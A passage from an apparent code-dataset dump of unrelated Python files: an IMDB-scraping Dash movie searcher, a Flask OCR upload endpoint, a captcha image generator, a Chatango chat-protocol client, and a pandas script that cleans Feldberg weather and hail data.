Movie\", color=\"primary\", id=\"sbumit_buttom\")\n ],\n xs=12, sm=12, md=12, lg=2, xl=2,\n style = {\"margin-top\": \"10px\", 'margin-left':'20px',}\n )\n \n ],\n justify=\"start\"\n )\n \n ],\n body=True, \n style={'display': 'inline-block',\n 'min-height':'100%',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-bottom': '10px',\n 'textAlign' : 'left',\n 'top': '0px',\n 'align-self': 'auto',\n 'position': 'sticky',\n 'zIndex': 999,\n 'color':font_color\n }\n)\n\n#####------------------app layout Starts Here-------------------------######\n\n# logo image\nimage_filename = 'IMDB_logo.png'\nencoded_image = base64.b64encode(open(image_filename, 'rb').read()).decode('ascii')\n\n\napp.layout = dbc.Container( \n [ \n dbc.Row([\n dbc.Col(\n html.Img(\n src='data:image/png;base64,{}'.format(encoded_image),\n id=\"logo-image\",\n style={\n \"height\": \"70px\",\n \"width\": \"auto\",\n \"margin-top\": \"3px\",\n 'textAlign' : 'left',\n 'display': 'inline-block'}),\n xs=12, sm=12, md=12, lg=3, xl=3,\n ),\n dbc.Col([\n html.H1(\"Movie Searcher\", \n style = {'textAlign' : 'Center',\n \"margin-top\": \"0px\", \n 'color': title_font_color}),\n html.H6('Search for Movie Information.',\n style={'textAlign' : 'Center',\n 'width' :'flex',\n 'font-size' : '12px', \n 'color': title_font_color}),\n ], xs=12, sm=12, md=12, lg=6, xl=6,\n ),\n dbc.Col(\n html.A(\n html.Button(\"IMDB.COM\", id=\"learn-more-button\"),\n href=\"https://www.imdb.com/\",\n style={'display': 'inline-block',\n \"margin-top\": \"20px\", 'width' : '100%', \n 'textAlign' : 'right'}\n ), xs=12, sm=12, md=12, lg=3, xl=3,\n ),\n ],\n style= {\"backgroundColor\" : background_color}\n ),\n dbc.Row(controls),\n html.Hr(),\n dbc.Row([dbc.Spinner(html.Div(id=\"alert_dash\"), color=\"light\")], \n style={'textAlign' : 'right'},\n ),\n dbc.Row(\n [\n dbc.Col(\n \n [\n dbc.Spinner(html.Div(id=\"alert_msg\"), color=\"light\"),\n dbc.CardImg(id=\"picture\", top=True)],xs=10, sm=10, md=10, lg=5, xl=5,\n style={'display': 'inline-block', \n #'width': 'flex',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-right': '10px',\n 'margin-top': '10px',\n }\n ),\n dbc.Col(\n [\n dbc.Row(\n dbc.Col([\n html.Br(),\n dbc.Row(html.H2(id='my-title',style={\"color\": 'white'})),\n html.Br(),\n html.Br(),\n html.Br(),\n 
dbc.Row(html.H4(id='my-rating',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-genre',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-cast',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-duration',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-parental_rating',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-release_date',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-director',style={\"color\": 'white'}))\n \n \n ],style ={'margin-left': '50px'}),\n \n \n ),\n ], xs=10, sm=10, md=10, lg=5, xl=5,\n style={'display': 'inline-block', \n #'width': 'flex',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-right': '10px',\n 'margin-top': '10px',\n },\n )\n ],\n justify=\"center\"\n ),\n \n ],\n fluid=True, style={'background-color':background_color}#'display': 'block'}\n)\n\n# In[]\n####Helper Function\n# finding selectors \nmovie_title_selector = 'h1'\nmovie_genre_selector = '.subtext a'\nmovie_cast_selector = '#titleCast .loadlate'\nmovie_poster_selector = '.poster img'\nmovie_rating_selector = '.ratingValue span'\nurl = 'https://www.imdb.com/title/tt1185834/'\nheaders = {\"Accept-Language\": \"en-US,en;q=0.5\"} # making sure the language scraped will be set in English\nresponse = requests.get(url, headers = headers)\nhtml_str = response.text\nsoup = BeautifulSoup(html_str)\n\nmovie_title = soup.select(movie_title_selector)[0].text.replace('\\xa0', \" \")\n#print(movie_title)\n# getting movie_genre\nmovie_genre = [i.text for i in soup.select(movie_genre_selector)][:-1]\n#print(movie_genre)\n# getting movie_cast\nmovie_cast = [i.get('alt') for i in soup.select(movie_cast_selector)]\n#print(movie_cast)\n# getting movie_poster\nmovie_poster = soup.select(movie_poster_selector)[0].get('src')\n#print(movie_poster)\n# getting movie_rating\nmovie_rating = float(soup.select(movie_rating_selector)[0].text)\n#print(movie_rating)\n\n\nmovie_time = soup.find_all('div', attrs = {'class':'subtext'})[0].find_all('time')[0].text.strip()\nmovie_parental_rating = soup.find_all('div', attrs = {'class':'subtext'})[0].text.strip().split('\\n')[0]\nmovie_release_date = soup.find_all('div', attrs = {'class':'subtext'})[0].find_all('a')[-1].text.strip().replace(' (USA)', '')\nmovie_director = soup.find_all('div', attrs = {'class' : 'credit_summary_item'})[0].find_all('a')[0].text\n\n\nfields_we_are_scaping = [\"Movie Title\", \"Movie Poster Link\", \"Rating\", \"Genre\", \"Cast\", \"Duration\", \n \"Parental Rating\", \"Release Date\", \"Director\"] # creating fields that we are going to scraped\nscraped_data = {keys:[] for keys in fields_we_are_scaping} # convert field to dict format\n\ndef get_movie_data_using_title(movie):\n scraped_data = {keys:[] for keys in fields_we_are_scaping} # clean up scraped data from previous search\n movie_title_selector = 'h1'\n movie_genre_selector = '.subtext a'\n movie_cast_selector = '#titleCast .loadlate'\n movie_poster_selector = '.poster img'\n movie_rating_selector = '.ratingValue span'\n #request finding data\n scraped_url_list = []\n headers = {\"Accept-Language\": \"en-US,en;q=0.5\"}\n params = {'q': movie, 's' : 'tt', 'ttype' : 'ft', 'ref' : 'fn_ft'} # q is our search input parameters\n response = requests.get('https://www.imdb.com/find', params = params, headers = headers)\n html_str = response.text\n soup = BeautifulSoup(html_str)\n search_result = soup.select('.result_text > a')\n for result in search_result:\n movie_url = 'https://www.imdb.com' + 
result.get('href') # combining the movies url with domain url\n scraped_url_list.append(movie_url)\n \n #request movie data from movie url\n for i, movie_url in enumerate (scraped_url_list[:1], start = 1): # only run ten search result, often times search result after the tenth is not relevant to our search\n headers = {\"Accept-Language\": \"en-US,en;q=0.5\"}\n response_movie = requests.get(movie_url, headers = headers)\n html_movie_str = response_movie.text\n soup_movie = BeautifulSoup(html_movie_str)\n # parsing data\n movie_title = soup_movie.select(movie_title_selector)[0].text.replace('\\xa0', \" \")\n #print('Working on {}'.format(movie_url),'Movie: {}'.format(movie_title), i,'/', 10)\n\n try:\n movie_poster = soup_movie.select(movie_poster_selector)[0].get('src')\n except:\n movie_poster = 'NA'\n try:\n movie_rating = float(soup_movie.select(movie_rating_selector)[0].text)\n except:\n movie_rating = 'NA'\n movie_genre = [i.text for i in soup_movie.select(movie_genre_selector)][:-1]\n movie_cast = [i.get('alt') for i in soup_movie.select(movie_cast_selector)]\n \n movie_time = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].find_all('time')[0].text.strip()\n movie_parental_rating = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].text.strip().split('\\n')[0]\n movie_release_date = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].find_all('a')[-1].text.strip().replace(' (USA)', '')\n movie_director = soup_movie.find_all('div', attrs = {'class' : 'credit_summary_item'})[0].find_all('a')[0].text\n\n\n #appending all data to scraped data\n scraped_data['Movie Title'].append(movie_title)\n scraped_data['Movie Poster Link'].append(movie_poster)\n scraped_data['Rating'].append(movie_rating)\n scraped_data['Genre'].append(movie_genre)\n scraped_data['Cast'].append(movie_cast)\n scraped_data['Duration'].append(movie_time)\n scraped_data['Parental Rating'].append(movie_parental_rating)\n scraped_data['Release Date'].append(movie_release_date)\n scraped_data['Director'].append(movie_director)\n\n return pd.DataFrame(scraped_data)\n\ndf = get_movie_data_using_title('Stars war')\n\n# In[]\n\n\n#####------------------Function Starts Here-------------------------######\n@app.callback(\n [Output(component_id = 'alert_msg', component_property = 'children'),\n Output(component_id = 'picture', component_property = 'src'),],\n Input(component_id = 'sbumit_buttom', component_property = 'n_clicks'),\n State(component_id = 'my_input', component_property = 'value'),\n\n)\n\ndef search_movie_image(n_clicks,my_input):\n \n df = get_movie_data_using_title(my_input)\n src = df['Movie Poster Link'][0]\n \n alert_msg = \"Movie Poster Generated!\"\n alert = dbc.Alert(alert_msg, color=\"success\", duration = 4000, dismissable=True)\n return alert, src\n\n\n@app.callback(\n [\n Output(component_id = 'my-title', component_property = 'children'),\n Output(component_id = 'my-rating', component_property = 'children'),\n Output(component_id = 'my-genre', component_property = 'children'),\n Output(component_id = 'my-cast', component_property = 'children'),\n Output(component_id = 'my-duration', component_property = 'children'),\n Output(component_id = 'my-parental_rating', component_property = 'children'),\n Output(component_id = 'my-release_date', component_property = 'children'),\n Output(component_id = 'my-director', component_property = 'children'),],\n Input(component_id = 'sbumit_buttom', component_property = 'n_clicks'),\n State(component_id = 'my_input', component_property = 
'value'),\n)\n\ndef display_name(button, value):\n \n df = get_movie_data_using_title(value)\n title = df['Movie Title'][0]\n rating = df['Rating'][0]\n genre = df['Genre'][0]\n cast = df['Cast'][0]\n duration = df['Duration'][0]\n parental_rating = df['Parental Rating'][0]\n release_date = df['Release Date'][0]\n director = df['Director'][0]\n \n return title, 'Rating : {} / 10'.format(rating), 'Genre : {}'.format(genre), 'Cast : {}'.format(cast), 'Duration : {}'.format(duration), 'Parental Rating : {}'.format(parental_rating), 'Release Date : {}'.format(release_date), 'Director : {}'.format(director)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8060)\n \n\n\n","sub_path":"Movie_Searcher.py","file_name":"Movie_Searcher.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
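Outside the Dash callbacks, the scraper can be driven directly (requires network access to imdb.com; the columns follow fields_we_are_scaping defined above):

df = get_movie_data_using_title('Inception')
row = df.iloc[0]
print(row['Movie Title'], row['Rating'], row['Director'])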
+{"seq_id":"34729849","text":"import logging\nimport time\nfrom flask import Flask, request\nfrom flask import jsonify\nfrom flask_restful import Resource\n\n# NOTE: read_scanned_image is assumed to live in the same module as read_scanned_pdf;\n# it is called below for image uploads but was missing from the original import.\nfrom controllers.scanned_to_machined import read_scanned_pdf, read_scanned_image\nfrom exceptions.exceptions_handler import *\nfrom constant import PDF_UPLOAD_DIRECTORY, PROJECT_ROOT, REFERENCE_FILE\nfrom os import path\nimport os\nimport subprocess\nimport copy \n\nfrom lib.common_methods import populate_missing\nfrom lib.parse_data import get_test_data, get_extraction, get_fidelity_extraction, extract_data\n#from openpyxl import Workbook\n#import openpyxl\nimport uuid\n\nclass FidelityData(Resource):\n\n\n\t\tdef get(self):\n\t\t\t\treturn jsonify({\"data\": get_extraction()})\n\t\t\t\t#return jsonify({\"hello\":\"wassup!!\"})\n\n\n\t\tdef post(self):\n\t\t\t\ttry:\n\t\t\t\t\t\tts = time.time()\n\t\t\t\t\t\tsave_path = PDF_UPLOAD_DIRECTORY\n\t\t\t\t\t\tfile = request.files['file']\n\t\t\t\t\t\txml_file = request.files['xml_file']\n\t\t\t\t\t\txml_file_name = xml_file.filename.replace(' ', '_')\n\n\t\t\t\t\t\tfile_name = file.filename.replace(' ', '_')\n\t\t\t\t\t\tfile_name_without_ext = os.path.basename(file_name).split('.')[0]\n\t\t\t\t\t\tfile_name_without_ext = file_name_without_ext + \"_\" + str(uuid.uuid1())\n\t\t\t\t\t\textension = path.splitext(file_name)[1]\n\t\t\t\t\t\tfile_name = file_name_without_ext + extension\n\t\t\t\t\t\tdoc_dir_location = os.path.join(save_path, file_name_without_ext)\n\t\t\t\t\t\tif not os.path.exists(doc_dir_location):\n\t\t\t\t\t\t\t\tos.makedirs(doc_dir_location)\n\t\t\t\t\t\tfile_location = os.path.join(doc_dir_location, file_name)\n\t\t\t\t\t\txml_file_location = os.path.join(doc_dir_location, xml_file_name)\n\t\t\t\t\t\tprint(f\"-----XML_file--->{xml_file_location}\")\n\t\t\t\t\t\txml_file.save( os.path.join(doc_dir_location, xml_file_name) )\n\t\t\t\t\t\tfile.save( file_location ) \n\n\n\t\t\t\t\t\t#erosion_val = [0, 3, 2, 4]\n\t\t\t\t\t\terosion_val = [0]\n\t\t\t\t\t\tmax_try = len(erosion_val) - 1\n\t\t\t\t\t\tfor index, e_val in enumerate(erosion_val):\n\t\t\t\t\t\t\t\tprint(\"EROSION_VALUE-------->\", e_val)\n\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif extension.lower() in ['.jpg', '.jpeg', '.png']:\n\t\t\t\t\t\t\t\t\t\tresult = read_scanned_image( file_location, doc_dir_location, e_val )\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tresult = read_scanned_pdf( file_location, doc_dir_location, e_val )\n\n \n\t\t\t\t\t\t\t\ttext_file_path = os.path.join(PDF_UPLOAD_DIRECTORY, file_name_without_ext, 'texts', 'stitched.txt')\n\t\t\t\t\t\t\t\t#with open( text_file_path ) as fp:\n\t\t\t\t\t\t\t\t#\t\tcontents = fp.readlines() \n \n\t\t\t\t\t\t\t\t#result = get_extraction()\n\t\t\t\t\t\t\t\t#result = get_fidelity_extraction(xml_file_location) \n\t\t\t\t\t\t\t\tresult = extract_data(os.path.join(PDF_UPLOAD_DIRECTORY, file_name_without_ext, 'texts'), xml_file_location) \n\t\t\t\t\t\t\t\tresult['pdf_file_path'] = 'pdf_file/'\t\t+ file_name_without_ext\n\t\t\t\t\t\t\t\tresult['excel_file_path'] = 'text_file/' + file_name_without_ext\n\t\t\t\t\t\t\t\t#parse_all_fields(contents, result) \n\n\t\t\t\t\t\t\t\tte = time.time()\n\t\t\t\t\t\t\t\tprint(f\"Time Taken---->{te - ts}\")\n\t\t\t\t\t\t\t\treturn jsonify( {\"data\": result} )\n\n\n\t\t\t\texcept CustomClassifierException as e:\n\t\t\t\t\t\tprint(\"1***ERROR***\", e)\n\t\t\t\t\t\tlogging.error(\"Error {} has occurred in controller\".format(e))\n\t\t\t\t\t\treturn e.response, e.http_code\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(\"2***ERROR***\", e)\n\t\t\t\t\t\tlogging.error(\"Error in service = {}\".format(e), exc_info=True)\n\t\t\t\t\t\treturn InternalServerErrorException(error_code=500,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\terror_message=\"Data Extraction failed!\").response, 500\n\n\t\t\t\tfinally:\n\t\t\t\t\t\tlogging.info(\"API Call Finished Successfully - 200\")\n\n\n\t\tdef create_template(self, template_path):\n\t\t\t\tsample_copy_path = \"/Users/shravanc/flask/aditya_birla/ocr-pdf-aditya-malaysia/sample_copy/sample.xlsx\"\n\t\t\t\t\n\n\t\t\t\ta = ['cp', sample_copy_path, template_path]\n\t\t\t\ttemplate_file = os.path.join(template_path, 'sample.xlsx')\n\t\t\t\tres = subprocess.check_output(a)\n\t\t\t\tprint(res)\n\t\t\t\treturn template_file\n\n","sub_path":"controllers/fidelity_data.py","file_name":"fidelity_data.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"177498129","text":"from flask import Flask,render_template,render_template_string\r\nimport os\r\nimport random\r\nfrom captcha.image import ImageCaptcha\r\nimage_captcha = ImageCaptcha()\r\nfrom io import BytesIO\r\nimport base64\r\n\r\nnumber_list = ['0','1','2','3','4','5','6','7','8','9']\r\n\r\nalphabet_lowercase = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n\r\nalphabet_uppercase = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n\r\ndef create_random_captcha_text(captcha_string_size=6):\r\n\r\n captcha_string_list = []\r\n\r\n base_char = alphabet_lowercase + alphabet_uppercase + number_list\r\n\r\n for i in range(captcha_string_size):\r\n\r\n # Select one character randomly.\r\n char = random.choice(base_char)\r\n\r\n # Append the character to the list.\r\n captcha_string_list.append(char)\r\n\r\n captcha_string = ''\r\n\r\n # Change the character list to string. \r\n for item in captcha_string_list:\r\n captcha_string += str(item)\r\n\r\n return captcha_string\r\n\r\ndef captchaimage():\r\n string = create_random_captcha_text()\r\n image = image_captcha.generate_image(string)\r\n #image2 = image_captcha.create_noise_dots(image,color=\"blue\")\r\n print(string)\r\n return string, image\r\n\r\napp = Flask(__name__,static_url_path = \"/static\", static_folder = \"static\")\r\n\r\n@app.route(\"/\",methods=['GET','POST'])\r\ndef cap_img():\r\n st, img = captchaimage()\r\n img.save(\"F:/bot/captcha/static/captcha.png\")\r\n #img_path = r\"F:\\bot\\captcha\"\r\n #path = \"/captcha.jpg\"\r\n #print(path)\r\n #old {{ url_for('static',filename='captcha.jpg') }}\r\n #new \"static/images/{{ employee.profile_image }}\" \"static/{{captcha}}\" ,captcha='captcha.jpg'\r\n\r\n # Serialize the PIL image to an in-memory PNG and base64-encode it.\r\n figfile = BytesIO()\r\n img.save(figfile, format='png')\r\n figfile.seek(0)\r\n figdata_png = base64.b64encode(figfile.getvalue())\r\n result = figdata_png.decode('ascii')\r\n\r\n # Minimal markup: the captcha is embedded inline as a base64 data URI.\r\n html = '''\r\n <img src=\"data:image/png;base64,{{ result }}\" alt=\"captcha\">\r\n '''\r\n\r\n return render_template_string(html, result=result)\r\n\r\nif __name__ == '__main__': \r\n \r\n # run() method of Flask class runs the application \r\n # on the local development server. \r\n app.run(debug=True)","sub_path":"appy.py","file_name":"appy.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
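The core trick in cap_img is embedding a PIL image as a data URI; isolated, it is just:

import base64
from io import BytesIO

def to_data_uri(pil_image):
    # Encode a PIL image as a base64 PNG data URI for an <img> src attribute.
    buf = BytesIO()
    pil_image.save(buf, format='PNG')
    return 'data:image/png;base64,' + base64.b64encode(buf.getvalue()).decode('ascii')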
+{"seq_id":"37682701","text":"import logging\nfrom asyncio import Protocol\n\nfrom . import utils\nfrom . import callback\n\n\ndef log_message(logger, msg, *args, **kwargs):\n \"\"\"Custom log method for incoming messages.\"\"\"\n logger.log(MESSAGE, msg, *args, **kwargs)\n\nMESSAGE = logging.INFO - 1\nlogging.addLevelName(MESSAGE, \"MESSAGE\")\nlogging.getLoggerClass().message = log_message\n\n\nclass ChatangoProtocol(Protocol):\n\n \"\"\"Chatango base protocol for streaming data.\"\"\"\n\n logger_name = \"Chatango.Protocol\"\n msg_factory = utils.MessageFactory\n usr_factory = utils.User\n address = (\"localhost\", 5222)\n terminator = b\"\r\n\x00\"\n encoding = \"utf-8\"\n seperator = \":\"\n\n def __init__(self, manager):\n \"\"\"Setup the connection based-off the manager.\"\"\"\n self.manager = manager\n self._callbacks = dict()\n self._connected = False\n self._active = True\n\n def connection_made(self, transport):\n \"\"\"Connection to server has been established.\"\"\"\n self.logger.info(\"Connection established.\")\n self.transport = transport\n self._connected = True\n self.login()\n\n def connection_lost(self, exception):\n \"\"\"Connection to server has been abolished.\"\"\"\n self._active, self._connected = False, False\n self.logger.info(\"Connection abolished.\")\n if exception:\n reason = utils.uncamelcase(type(exception).__name__)\n self.logger.debug(\"Connection lost due to: %s\", reason)\n\n def data_received(self, raw):\n \"\"\"Data was received from the underlying socket.\"\"\"\n self.logger.debug(\"Raw Recv: %r\", raw.split(self.terminator)[:-1])\n for rawdata in raw.split(self.terminator)[:-1]:\n self.logger.debug(\"Recv: %r\", rawdata)\n data = rawdata.decode(self.encoding).split(self.seperator)\n command, params = utils.camelcase(data[0] or \"Pong\"), data[1:]\n handle = self.handle_command(command, *params)\n if handle is NotImplemented:\n self.handle_NotImplemented(command, *params)\n\n def handle_command(self, command, *params):\n \"\"\"Handle the incoming event/command.\"\"\"\n method = getattr(self, \"cmd_%s\" % command, None)\n if callable(method):\n try:\n method(*params)\n except:\n self.logger.exception(\"Error in handling %s\", command)\n else:\n return NotImplemented\n\n def handle_NotImplemented(self, command, *params):\n \"\"\"Handle for the commands that are not implemented (yet).\"\"\"\n pass\n\n def login(self):\n \"\"\"Execute the command for logging into the server.\"\"\"\n pass\n\n def logout(self):\n \"\"\"Execute the command for logging out from the server.\"\"\"\n self.transport.close()\n\n def sendCommand(self, cmd, *args):\n data = \":\".join(map(str, (cmd,)+args)).encode(self.encoding)\n self.transport.write(data + self.terminator)\n self.logger.debug(\"Sent: %r\", data)\n\n def sendHeartbeat(self):\n \"\"\"Send a heartbeat (stay-alive) signal to the server.\"\"\"\n self.sendCommand(\"\")\n\n def addCallback(self, *callbacks):\n for cb in callbacks:\n self._callbacks[cb] = cb(self)\n\n def delCallback(self, *callbacks):\n for cb in callbacks:\n if cb in self._callbacks:\n del self._callbacks[cb]\n\n @property\n def callbacks(self):\n return self._callbacks.values()\n\n @property\n def logger(self):\n \"\"\"Logger for the protocol.\"\"\"\n return logging.getLogger(self.logger_name)\n\n @property\n def isActive(self):\n \"\"\"Check if the protocol is active.\"\"\"\n return self._active\n\n @property\n def isConnected(self):\n \"\"\"Check if the connection is established.\"\"\"\n return self._connected\n\n\nclass 
ChatangoServerProtocol(ChatangoProtocol):\n\n logger_name = \"ChServer.Protocol\"\n\n def __init__(self, manager):\n \"\"\"Setup an server protocol and include an message queue.\"\"\"\n from queue import Queue\n super().__init__(manager)\n self.msg_queue = Queue()\n self.msg_queue.put(\"help\")\n\n\nclass PrivateMessages(ChatangoProtocol):\n\n \"\"\"Chatango Private Messages Protocol.\"\"\"\n\n logger_name = \"Chatango.PrivMsgs\"\n msg_factory = utils.PmMessageFactory\n address = (\"c1.chatango.com\", 5222)\n\n def cmd_Ok(self):\n \"\"\"Granted server access.\"\"\"\n self.logger.info(\"Server Access: Granted\")\n self.signedOn()\n\n def cmd_Denied(self):\n \"\"\"Denied server access.\"\"\"\n self.logger.critical(\"Server Access: Denied\")\n self.logout()\n\n def cmd_Msg(self, user, name, _1, time_, _2, *msg_parts):\n \"\"\"An message was received from another user.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n usr = self.usr_factory(user)\n self.recvMessage(usr, msg, offline=False)\n\n def cmd_Msgoff(self, user, name, _1, time_, _2, *msg_parts):\n \"\"\"An message was received from another user, while offline.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n usr = self.usr_factory(user)\n self.recvMessage(usr, msg, offline=True)\n\n def login(self):\n \"\"\"Execute the command for logging into the server.\"\"\"\n if self.authkey:\n self.sendCommand(\"tlogin\", self.authkey, 2)\n else:\n self.logger.critical(\"Invalid credentials - Force closing...\")\n self.manager.stop()\n\n def sendMessage(self, user, message):\n \"\"\"Send an message to another user.\"\"\"\n msg = self.msg_factory.outgoing.build(str(message))\n self.sendCommand(\"msg\", user, msg)\n\n @callback.method\n def signedOn(self):\n \"\"\"Handle signing onto the server.\"\"\"\n pass\n\n @callback.method\n def recvMessage(self, user, message, offline=False):\n \"\"\"Handle receiving an message from another user.\"\"\"\n self.logger.message(\"%s: %s\", user, message)\n # self.sendMessage(user, message)\n\n @property\n def authkey(self):\n \"\"\"Authentication key for signing in.\"\"\"\n from urllib.request import install_opener, build_opener, urlopen\n from urllib.request import HTTPCookieProcessor, URLError\n import http.cookiejar\n import urllib.parse\n if self.manager.running_locally:\n return \".\".join(self.manager.credentials)\n cookiejar = http.cookiejar.CookieJar()\n install_opener(build_opener(HTTPCookieProcessor(cookiejar)))\n urlopen(\"http://chatango.com/login\", urllib.parse.urlencode(dict(\n user_id=self.manager.credentials.username,\n password=self.manager.credentials.password,\n storecookie=\"on\", checkerrors=\"yes\")).encode())\n cookies = dict((cookie.name, cookie.value) for cookie in cookiejar)\n return cookies.get(\"auth.chatango.com\", \"\")\n\n\n\nclass PrivateMessagesServer(ChatangoServerProtocol):\n\n logger_name = \"ChServer.PrivMsgs\"\n msg_factory = utils.PmMessageFactory\n\n def cmd_Tlogin(self, authkey, version):\n \"\"\"Client is requesting server access.\"\"\"\n self.sendCommand(\"ok\")\n self.sendMessage()\n\n def cmd_Msg(self, user, *msg_parts):\n \"\"\"Client is sending an message to another user.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n self.logger.message(\"Client -> %s: %s\", user, msg)\n self.sendMessage()\n\n def sendMessage(self):\n if self.msg_queue.empty():\n self.logout()\n else:\n from time import time\n usr, msg = 
\"Server\", self.msg_queue.get()\n cmd, tmp, msg = \"msg\", \"?\", self.msg_factory.outgoing.build(msg)\n self.sendCommand(cmd, usr, usr, tmp, time(), tmp, msg)\n","sub_path":"Chatango/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
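Protocol subclasses like PrivateMessages are meant to be handed to the event loop; a hedged sketch of the wiring (the manager object is assumed to carry the credentials the class expects):

import asyncio

async def connect(manager):
    loop = asyncio.get_running_loop()
    transport, proto = await loop.create_connection(
        lambda: PrivateMessages(manager),
        *PrivateMessages.address)   # ('c1.chatango.com', 5222)
    return transport, proto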
+{"seq_id":"213283173","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import explained_variance_score, \\\n mean_absolute_error, \\\n median_absolute_error\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\nfeldbergHageltage = pd.read_csv('produkt_wetter_tag_19490101_20140131_01346.txt', sep=\";\")\n\n# Mess_Datum in Datentyp Datetime umwandeln und als Index setzen\nfeldbergHageltage['MESS_DATUM'] = pd.to_datetime(arg=feldbergHageltage['MESS_DATUM'], format='%Y%m%d')\nfeldbergHageltage.set_index('MESS_DATUM', inplace=True)\n\nfeldbergWetter = pd.read_csv('produkt_klima_tag_19450101_20201231_01346.txt', sep=\";\")\nfeldbergWetter['MESS_DATUM'] = pd.to_datetime(arg=feldbergWetter['MESS_DATUM'], format='%Y%m%d')\nfeldbergWetter.set_index('MESS_DATUM', inplace=True)\n\n# feldbergHageltage enthält nur noch Index und die Spalte HAGEL\nfeldbergHageltage = feldbergHageltage['HAGEL']\n# Spalte HAGEL in feldbergWetter angehängt\nfeldbergWetter['HAGEL'] = feldbergHageltage\n\n# Kontrolle welche Werte in der Spalte HAGEL auftreten = 0, 1, 99\n#feldbergWetter['HAGEL'].unique()\n\n# Löscht alle Zeilen in den irgendwo nan steht - löscht möglicherweise auch Zeilen die nicht gelöscht werden sollen\n#print(feldbergWetter.dropna())\n\n# Löscht alle Zeilen in der Spalte HAGEL in denen nan steht\nfeldbergWetter = feldbergWetter[feldbergWetter['HAGEL'].notna()]\n\n# Löschen der Spalten die irrelevant sind\nfeldbergWetter = feldbergWetter.drop(columns=['QN_3', 'QN_4', 'eor'])\n\n# Umbenennung der Spaltennamen\nfeldbergWetter = feldbergWetter.rename(columns={' FX': 'WindstaerkeMax',' FM': 'WindstaerkeMittel',\n ' RSK': 'Niederschlagshoehe', 'RSKF': 'Niederschlagsform', ' SDK': 'Sonnenscheindauer',\n 'SHK_TAG': 'Schneehoehe', ' NM': 'Bewoelkung', ' VPM': 'DampfdruckMittel',\n ' PM': 'LuftdruckMittel', ' TMK': 'TemperaturMittel', ' UPM': 'RelativeFeuchteMittel',\n ' TXK': 'LufttemperaturMax', ' TNK': 'LufttemperaturMin2m', ' TGK': 'LufttemperaturMin5cm',\n 'HAGEL': 'Hagel'})\n\n# ---------------------------------------------------------------------------------------\n# Zwischenstand : Datei mit Werten in Dataframe umgewandelt und Spalten eindeutig benannt.\n# Hagel in der Tabelle mit dem Wetter angehängt\n# Zeilen gelöscht in denen kein Wert für Hagel vorhanden ist\n# ---------------------------------------------------------------------------------------\n\n# Anzeigen der Spalten\n# print(feldbergWetter.columns)\n\n# Anzeigen aller Spalten bei einer Ausgabe mit 'print'\npd.set_option('max_columns', None)\n#print(feldbergWetter.head(20))\n\n\n# -999.0 Werte in jeder Spalte zählen / -999.0 = Fehlwert\nfehlwerteInSpalten = {\n 'fehlwerteWindstaerkeMax' : feldbergWetter.WindstaerkeMax==-999.0,\n 'fehlwerteWindstaerkeMittel' : feldbergWetter.WindstaerkeMittel==-999.0,\n 'fehlwerteNiederschlagshoehe' : feldbergWetter.Niederschlagshoehe==-999.0,\n 'fehlwerteNiederschlagsform' : feldbergWetter.Niederschlagsform==-999.0,\n 'fehlwerteSonnenscheindauer' : feldbergWetter.Sonnenscheindauer==-999.0,\n 'fehlwerteSchneehoehe' : feldbergWetter.Schneehoehe==-999.0,\n 'fehlwerteBewoelkung' : feldbergWetter.Bewoelkung==-999.0,\n 'fehlwerteDampfdruckMittel' : feldbergWetter.DampfdruckMittel==-999.0,\n 'fehlwerteLuftdruckMittel' : feldbergWetter.LuftdruckMittel==-999.0,\n 'fehlwerteTemperaturMittel' : feldbergWetter.TemperaturMittel==-999.0,\n 'fehlwerteRelativeFeuchteMittel' : feldbergWetter.RelativeFeuchteMittel==-999.0,\n 
